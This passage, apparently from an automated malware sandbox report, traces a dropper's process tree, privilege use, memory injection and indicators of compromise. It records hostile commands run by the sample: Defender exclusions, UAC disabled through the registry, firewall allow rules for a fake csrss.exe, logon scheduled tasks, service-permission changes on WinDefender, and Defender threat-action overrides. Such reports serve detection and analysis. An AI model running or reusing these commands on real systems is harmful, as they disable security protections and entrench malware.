1432	IDJwuh7Gfalnn3G3fSt8LiFK.exe
1432	IDJwuh7Gfalnn3G3fSt8LiFK.exe
1288	powershell.exe
1288	powershell.exe
4008	powershell.exe
4008	powershell.exe
4008	powershell.exe
1288	powershell.exe
2020	powershell.exe
2020	powershell.exe
992	powershell.exe
992	powershell.exe
2020	powershell.exe
992	powershell.exe
4172	powershell.exe
4172	powershell.exe
1984	powershell.exe
1984	powershell.exe
1972	powershell.exe
1972	powershell.exe
3908	injector.exe
3908	injector.exe
3908	injector.exe
3908	injector.exe
3908	injector.exe
3908	injector.exe
1408	csrss.exe
1408	csrss.exe
3908	injector.exe
3908	injector.exe
3908	injector.exe
3908	injector.exe

Suspicious behavior: MapViewOfSection 3 IoCs

Processes:

UniversalInstaller.execmd.exe

pid process

568 UniversalInstaller.exe
4956 cmd.exe
4956 cmd.exe

pid	process
568	UniversalInstaller.exe
4956	cmd.exe
4956	cmd.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

95442c887f47bbb4b350fca87c45dc6ef95355ce86a63d7c2f50db2d92ae512e.exepowershell.exejsc.exepowershell.exepowershell.exeT8aHe9G2jy90tHW1nG82yaRw.exeIDJwuh7Gfalnn3G3fSt8LiFK.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.execsrss.exesc.exepowershell.exeWMIC.exe

description	pid	process
Token: SeDebugPrivilege	1384	95442c887f47bbb4b350fca87c45dc6ef95355ce86a63d7c2f50db2d92ae512e.exe
Token: SeDebugPrivilege	4324	powershell.exe
Token: SeDebugPrivilege	2304	jsc.exe
Token: SeDebugPrivilege	1288	powershell.exe
Token: SeDebugPrivilege	4812	powershell.exe
Token: SeDebugPrivilege	4796	T8aHe9G2jy90tHW1nG82yaRw.exe
Token: SeDebugPrivilege	1988	IDJwuh7Gfalnn3G3fSt8LiFK.exe
Token: SeImpersonatePrivilege	4796	T8aHe9G2jy90tHW1nG82yaRw.exe
Token: SeImpersonatePrivilege	1988	IDJwuh7Gfalnn3G3fSt8LiFK.exe
Token: SeDebugPrivilege	2496	powershell.exe
Token: SeDebugPrivilege	3780	powershell.exe
Token: SeDebugPrivilege	1288	powershell.exe
Token: SeDebugPrivilege	4008	powershell.exe
Token: SeDebugPrivilege	2020	powershell.exe
Token: SeDebugPrivilege	992	powershell.exe
Token: SeDebugPrivilege	4172	powershell.exe
Token: SeDebugPrivilege	1984	powershell.exe
Token: SeDebugPrivilege	1972	powershell.exe
Token: SeSystemEnvironmentPrivilege	1408	csrss.exe
Token: SeSecurityPrivilege	4268	sc.exe
Token: SeSecurityPrivilege	4268	sc.exe
Token: SeDebugPrivilege	2576	powershell.exe
Token: SeIncreaseQuotaPrivilege	4356	WMIC.exe
Token: SeSecurityPrivilege	4356	WMIC.exe
Token: SeTakeOwnershipPrivilege	4356	WMIC.exe
Token: SeLoadDriverPrivilege	4356	WMIC.exe
Token: SeSystemProfilePrivilege	4356	WMIC.exe
Token: SeSystemtimePrivilege	4356	WMIC.exe
Token: SeProfSingleProcessPrivilege	4356	WMIC.exe
Token: SeIncBasePriorityPrivilege	4356	WMIC.exe
Token: SeCreatePagefilePrivilege	4356	WMIC.exe
Token: SeBackupPrivilege	4356	WMIC.exe
Token: SeRestorePrivilege	4356	WMIC.exe
Token: SeShutdownPrivilege	4356	WMIC.exe
Token: SeDebugPrivilege	4356	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4356	WMIC.exe
Token: SeRemoteShutdownPrivilege	4356	WMIC.exe
Token: SeUndockPrivilege	4356	WMIC.exe
Token: SeManageVolumePrivilege	4356	WMIC.exe
Token: 33	4356	WMIC.exe
Token: 34	4356	WMIC.exe
Token: 35	4356	WMIC.exe
Token: 36	4356	WMIC.exe
Token: SeIncreaseQuotaPrivilege	4356	WMIC.exe
Token: SeSecurityPrivilege	4356	WMIC.exe
Token: SeTakeOwnershipPrivilege	4356	WMIC.exe
Token: SeLoadDriverPrivilege	4356	WMIC.exe
Token: SeSystemProfilePrivilege	4356	WMIC.exe
Token: SeSystemtimePrivilege	4356	WMIC.exe
Token: SeProfSingleProcessPrivilege	4356	WMIC.exe
Token: SeIncBasePriorityPrivilege	4356	WMIC.exe
Token: SeCreatePagefilePrivilege	4356	WMIC.exe
Token: SeBackupPrivilege	4356	WMIC.exe
Token: SeRestorePrivilege	4356	WMIC.exe
Token: SeShutdownPrivilege	4356	WMIC.exe
Token: SeDebugPrivilege	4356	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4356	WMIC.exe
Token: SeRemoteShutdownPrivilege	4356	WMIC.exe
Token: SeUndockPrivilege	4356	WMIC.exe
Token: SeManageVolumePrivilege	4356	WMIC.exe
Token: 33	4356	WMIC.exe
Token: 34	4356	WMIC.exe
Token: 35	4356	WMIC.exe
Token: 36	4356	WMIC.exe

Suspicious use of SetWindowsHookEx 5 IoCs

Processes:

Qg_Appv5.exeUniversalInstaller.exeUniversalInstaller.exe

pid process

2616 Qg_Appv5.exe
4276 UniversalInstaller.exe
4276 UniversalInstaller.exe
568 UniversalInstaller.exe
568 UniversalInstaller.exe

pid	process
2616	Qg_Appv5.exe
4276	UniversalInstaller.exe
4276	UniversalInstaller.exe
568	UniversalInstaller.exe
568	UniversalInstaller.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

95442c887f47bbb4b350fca87c45dc6ef95355ce86a63d7c2f50db2d92ae512e.exejsc.exeIDJwuh7Gfalnn3G3fSt8LiFK.exeT8aHe9G2jy90tHW1nG82yaRw.exeT8aHe9G2jy90tHW1nG82yaRw.exeIDJwuh7Gfalnn3G3fSt8LiFK.execmd.execmd.exe5C7CoHlC72ZxGrZ2pQr8gLtb.execsrss.exe

description	pid	process	target process
PID 1384 wrote to memory of 4324	1384	95442c887f47bbb4b350fca87c45dc6ef95355ce86a63d7c2f50db2d92ae512e.exe	powershell.exe
PID 1384 wrote to memory of 4324	1384	95442c887f47bbb4b350fca87c45dc6ef95355ce86a63d7c2f50db2d92ae512e.exe	powershell.exe
PID 1384 wrote to memory of 2304	1384	95442c887f47bbb4b350fca87c45dc6ef95355ce86a63d7c2f50db2d92ae512e.exe	jsc.exe
PID 1384 wrote to memory of 2304	1384	95442c887f47bbb4b350fca87c45dc6ef95355ce86a63d7c2f50db2d92ae512e.exe	jsc.exe
PID 1384 wrote to memory of 2304	1384	95442c887f47bbb4b350fca87c45dc6ef95355ce86a63d7c2f50db2d92ae512e.exe	jsc.exe
PID 1384 wrote to memory of 2304	1384	95442c887f47bbb4b350fca87c45dc6ef95355ce86a63d7c2f50db2d92ae512e.exe	jsc.exe
PID 1384 wrote to memory of 2304	1384	95442c887f47bbb4b350fca87c45dc6ef95355ce86a63d7c2f50db2d92ae512e.exe	jsc.exe
PID 1384 wrote to memory of 2304	1384	95442c887f47bbb4b350fca87c45dc6ef95355ce86a63d7c2f50db2d92ae512e.exe	jsc.exe
PID 1384 wrote to memory of 2304	1384	95442c887f47bbb4b350fca87c45dc6ef95355ce86a63d7c2f50db2d92ae512e.exe	jsc.exe
PID 1384 wrote to memory of 2304	1384	95442c887f47bbb4b350fca87c45dc6ef95355ce86a63d7c2f50db2d92ae512e.exe	jsc.exe
PID 1384 wrote to memory of 2952	1384	95442c887f47bbb4b350fca87c45dc6ef95355ce86a63d7c2f50db2d92ae512e.exe	jsc.exe
PID 1384 wrote to memory of 2952	1384	95442c887f47bbb4b350fca87c45dc6ef95355ce86a63d7c2f50db2d92ae512e.exe	jsc.exe
PID 1384 wrote to memory of 2952	1384	95442c887f47bbb4b350fca87c45dc6ef95355ce86a63d7c2f50db2d92ae512e.exe	jsc.exe
PID 2304 wrote to memory of 920	2304	jsc.exe	5C7CoHlC72ZxGrZ2pQr8gLtb.exe
PID 2304 wrote to memory of 920	2304	jsc.exe	5C7CoHlC72ZxGrZ2pQr8gLtb.exe
PID 2304 wrote to memory of 920	2304	jsc.exe	5C7CoHlC72ZxGrZ2pQr8gLtb.exe
PID 2304 wrote to memory of 1988	2304	jsc.exe	IDJwuh7Gfalnn3G3fSt8LiFK.exe
PID 2304 wrote to memory of 1988	2304	jsc.exe	IDJwuh7Gfalnn3G3fSt8LiFK.exe
PID 2304 wrote to memory of 1988	2304	jsc.exe	IDJwuh7Gfalnn3G3fSt8LiFK.exe
PID 2304 wrote to memory of 4796	2304	jsc.exe	T8aHe9G2jy90tHW1nG82yaRw.exe
PID 2304 wrote to memory of 4796	2304	jsc.exe	T8aHe9G2jy90tHW1nG82yaRw.exe
PID 2304 wrote to memory of 4796	2304	jsc.exe	T8aHe9G2jy90tHW1nG82yaRw.exe
PID 1988 wrote to memory of 1288	1988	IDJwuh7Gfalnn3G3fSt8LiFK.exe	powershell.exe
PID 1988 wrote to memory of 1288	1988	IDJwuh7Gfalnn3G3fSt8LiFK.exe	powershell.exe
PID 1988 wrote to memory of 1288	1988	IDJwuh7Gfalnn3G3fSt8LiFK.exe	powershell.exe
PID 4796 wrote to memory of 4812	4796	T8aHe9G2jy90tHW1nG82yaRw.exe	powershell.exe
PID 4796 wrote to memory of 4812	4796	T8aHe9G2jy90tHW1nG82yaRw.exe	powershell.exe
PID 4796 wrote to memory of 4812	4796	T8aHe9G2jy90tHW1nG82yaRw.exe	powershell.exe
PID 1384 wrote to memory of 2496	1384	T8aHe9G2jy90tHW1nG82yaRw.exe	powershell.exe
PID 1384 wrote to memory of 2496	1384	T8aHe9G2jy90tHW1nG82yaRw.exe	powershell.exe
PID 1384 wrote to memory of 2496	1384	T8aHe9G2jy90tHW1nG82yaRw.exe	powershell.exe
PID 1432 wrote to memory of 3780	1432	IDJwuh7Gfalnn3G3fSt8LiFK.exe	powershell.exe
PID 1432 wrote to memory of 3780	1432	IDJwuh7Gfalnn3G3fSt8LiFK.exe	powershell.exe
PID 1432 wrote to memory of 3780	1432	IDJwuh7Gfalnn3G3fSt8LiFK.exe	powershell.exe
PID 2304 wrote to memory of 3108	2304	jsc.exe	AA94amAZhUMMf52xrK6WqgJN.exe
PID 2304 wrote to memory of 3108	2304	jsc.exe	AA94amAZhUMMf52xrK6WqgJN.exe
PID 1384 wrote to memory of 1496	1384	T8aHe9G2jy90tHW1nG82yaRw.exe	cmd.exe
PID 1384 wrote to memory of 1496	1384	T8aHe9G2jy90tHW1nG82yaRw.exe	cmd.exe
PID 1432 wrote to memory of 4192	1432	IDJwuh7Gfalnn3G3fSt8LiFK.exe	cmd.exe
PID 1432 wrote to memory of 4192	1432	IDJwuh7Gfalnn3G3fSt8LiFK.exe	cmd.exe
PID 1496 wrote to memory of 2568	1496	cmd.exe	netsh.exe
PID 1496 wrote to memory of 2568	1496	cmd.exe	netsh.exe
PID 4192 wrote to memory of 2572	4192	cmd.exe	netsh.exe
PID 4192 wrote to memory of 2572	4192	cmd.exe	netsh.exe
PID 1384 wrote to memory of 1288	1384	T8aHe9G2jy90tHW1nG82yaRw.exe	powershell.exe
PID 1384 wrote to memory of 1288	1384	T8aHe9G2jy90tHW1nG82yaRw.exe	powershell.exe
PID 1384 wrote to memory of 1288	1384	T8aHe9G2jy90tHW1nG82yaRw.exe	powershell.exe
PID 920 wrote to memory of 568	920	5C7CoHlC72ZxGrZ2pQr8gLtb.exe	upk.0.exe
PID 920 wrote to memory of 568	920	5C7CoHlC72ZxGrZ2pQr8gLtb.exe	upk.0.exe
PID 920 wrote to memory of 568	920	5C7CoHlC72ZxGrZ2pQr8gLtb.exe	upk.0.exe
PID 1432 wrote to memory of 4008	1432	IDJwuh7Gfalnn3G3fSt8LiFK.exe	powershell.exe
PID 1432 wrote to memory of 4008	1432	IDJwuh7Gfalnn3G3fSt8LiFK.exe	powershell.exe
PID 1432 wrote to memory of 4008	1432	IDJwuh7Gfalnn3G3fSt8LiFK.exe	powershell.exe
PID 1384 wrote to memory of 992	1384	T8aHe9G2jy90tHW1nG82yaRw.exe	powershell.exe
PID 1384 wrote to memory of 992	1384	T8aHe9G2jy90tHW1nG82yaRw.exe	powershell.exe
PID 1384 wrote to memory of 992	1384	T8aHe9G2jy90tHW1nG82yaRw.exe	powershell.exe
PID 1432 wrote to memory of 2020	1432	IDJwuh7Gfalnn3G3fSt8LiFK.exe	powershell.exe
PID 1432 wrote to memory of 2020	1432	IDJwuh7Gfalnn3G3fSt8LiFK.exe	powershell.exe
PID 1432 wrote to memory of 2020	1432	IDJwuh7Gfalnn3G3fSt8LiFK.exe	powershell.exe
PID 1432 wrote to memory of 1408	1432	IDJwuh7Gfalnn3G3fSt8LiFK.exe	csrss.exe
PID 1432 wrote to memory of 1408	1432	IDJwuh7Gfalnn3G3fSt8LiFK.exe	csrss.exe
PID 1432 wrote to memory of 1408	1432	IDJwuh7Gfalnn3G3fSt8LiFK.exe	csrss.exe
PID 1408 wrote to memory of 4172	1408	csrss.exe	powershell.exe
PID 1408 wrote to memory of 4172	1408	csrss.exe	powershell.exe

System policy modification 1 TTPs 1 IoCs

evasion

Modify Registry

Processes:

95442c887f47bbb4b350fca87c45dc6ef95355ce86a63d7c2f50db2d92ae512e.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	95442c887f47bbb4b350fca87c45dc6ef95355ce86a63d7c2f50db2d92ae512e.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\95442c887f47bbb4b350fca87c45dc6ef95355ce86a63d7c2f50db2d92ae512e.exe
"C:\Users\Admin\AppData\Local\Temp\95442c887f47bbb4b350fca87c45dc6ef95355ce86a63d7c2f50db2d92ae512e.exe"
1⤵
- UAC bypass
- Windows security bypass
- Windows security modification
- Checks whether UAC is enabled
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:1384

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\95442c887f47bbb4b350fca87c45dc6ef95355ce86a63d7c2f50db2d92ae512e.exe" -Force
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4324

C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"
2⤵
- Drops startup file
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2304

C:\Users\Admin\Pictures\5C7CoHlC72ZxGrZ2pQr8gLtb.exe
"C:\Users\Admin\Pictures\5C7CoHlC72ZxGrZ2pQr8gLtb.exe"
3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:920

C:\Users\Admin\AppData\Local\Temp\upk.0.exe
"C:\Users\Admin\AppData\Local\Temp\upk.0.exe"
4⤵
- Executes dropped EXE
PID:568

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 568 -s 1092
5⤵
- Program crash
PID:2976

C:\Users\Admin\AppData\Local\Temp\Qg_Appv5.exe
"C:\Users\Admin\AppData\Local\Temp\Qg_Appv5.exe"
4⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:2616

C:\Users\Admin\AppData\Local\Temp\Zqicom_beta\UniversalInstaller.exe
C:\Users\Admin\AppData\Local\Temp\Zqicom_beta\UniversalInstaller.exe
5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetWindowsHookEx
PID:4276

C:\Users\Admin\AppData\Roaming\Zqicom_beta\UniversalInstaller.exe
C:\Users\Admin\AppData\Roaming\Zqicom_beta\UniversalInstaller.exe
6⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
PID:568

C:\Windows\SysWOW64\cmd.exe
C:\Windows\SysWOW64\cmd.exe
7⤵
- Suspicious use of SetThreadContext
- Drops file in Windows directory
- Suspicious behavior: MapViewOfSection
PID:4956

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
8⤵
PID:2448

C:\Users\Admin\Pictures\IDJwuh7Gfalnn3G3fSt8LiFK.exe
"C:\Users\Admin\Pictures\IDJwuh7Gfalnn3G3fSt8LiFK.exe"
3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1988

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1288

C:\Users\Admin\Pictures\IDJwuh7Gfalnn3G3fSt8LiFK.exe
"C:\Users\Admin\Pictures\IDJwuh7Gfalnn3G3fSt8LiFK.exe"
4⤵
- Windows security bypass
- Executes dropped EXE
- Windows security modification
- Adds Run key to start application
- Checks for VirtualBox DLLs, possible anti-VM trick
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1432

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
5⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3780

C:\Windows\system32\cmd.exe
C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
5⤵
- Suspicious use of WriteProcessMemory
PID:4192

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
6⤵
- Modifies Windows Firewall
PID:2572

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
5⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4008

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
5⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2020

C:\Windows\rss\csrss.exe
C:\Windows\rss\csrss.exe
5⤵
- Executes dropped EXE
- Adds Run key to start application
- Manipulates WinMonFS driver.
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1408

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
6⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4172

C:\Windows\SYSTEM32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
6⤵
- Creates scheduled task(s)
PID:4880

C:\Windows\SYSTEM32\schtasks.exe
schtasks /delete /tn ScheduledUpdate /f
6⤵
PID:544

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
6⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1984

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
6⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1972

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:3908

C:\Windows\SYSTEM32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
6⤵
- Creates scheduled task(s)
PID:948

C:\Windows\windefender.exe
"C:\Windows\windefender.exe"
6⤵
- Executes dropped EXE
PID:4848

C:\Windows\SysWOW64\cmd.exe
cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
7⤵
PID:1556

C:\Windows\SysWOW64\sc.exe
sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
8⤵
- Launches sc.exe
- Suspicious use of AdjustPrivilegeToken
PID:4268

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1988 -s 976
4⤵
- Program crash
PID:3016

C:\Users\Admin\Pictures\T8aHe9G2jy90tHW1nG82yaRw.exe
"C:\Users\Admin\Pictures\T8aHe9G2jy90tHW1nG82yaRw.exe"
3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4796

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4812

C:\Users\Admin\Pictures\T8aHe9G2jy90tHW1nG82yaRw.exe
"C:\Users\Admin\Pictures\T8aHe9G2jy90tHW1nG82yaRw.exe"
4⤵
- Executes dropped EXE
- Adds Run key to start application
- Checks for VirtualBox DLLs, possible anti-VM trick
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1384

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
5⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2496

C:\Windows\system32\cmd.exe
C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
5⤵
- Suspicious use of WriteProcessMemory
PID:1496

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
6⤵
- Modifies Windows Firewall
PID:2568

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
5⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1288

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
5⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:992

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4796 -s 936
4⤵
- Program crash
PID:568

C:\Users\Admin\Pictures\AA94amAZhUMMf52xrK6WqgJN.exe
"C:\Users\Admin\Pictures\AA94amAZhUMMf52xrK6WqgJN.exe"
3⤵
- Modifies firewall policy service
- Windows security bypass
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Windows security modification
- Checks whether UAC is enabled
- Drops file in System32 directory
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:3108

C:\Users\Admin\Pictures\s2tweovw0BvcM0wIqlTZALVa.exe
"C:\Users\Admin\Pictures\s2tweovw0BvcM0wIqlTZALVa.exe"
3⤵
- Executes dropped EXE
PID:3572

C:\Users\Admin\AppData\Local\Temp\7zSF9EB.tmp\Install.exe
.\Install.exe /nxdidQZJ "385118" /S
4⤵
- Checks BIOS information in registry
- Executes dropped EXE
- Enumerates system info in registry
PID:784

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
5⤵
PID:2408

C:\Windows\SysWOW64\cmd.exe
/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
6⤵
PID:4012

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
7⤵
- Suspicious use of AdjustPrivilegeToken
PID:2576

C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
8⤵
- Suspicious use of AdjustPrivilegeToken
PID:4356

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "bWycNackLSywaqkmgR" /SC once /ST 04:52:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY\NwfPJCCpQqPYDzK\RMWIhxT.exe\" em /tXsite_idrwh 385118 /S" /V1 /F
5⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:3912

C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"
2⤵
PID:2952

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 1988 -ip 1988
1⤵
PID:544

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 4796 -ip 4796
1⤵
PID:224

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
1⤵
PID:1824

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
1⤵
PID:3972

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 400 -p 568 -ip 568
1⤵
PID:4696

C:\Windows\windefender.exe
C:\Windows\windefender.exe
1⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:4168

C:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY\NwfPJCCpQqPYDzK\RMWIhxT.exe
C:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY\NwfPJCCpQqPYDzK\RMWIhxT.exe em /tXsite_idrwh 385118 /S
1⤵
- Executes dropped EXE
- Drops file in System32 directory
PID:2168

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD 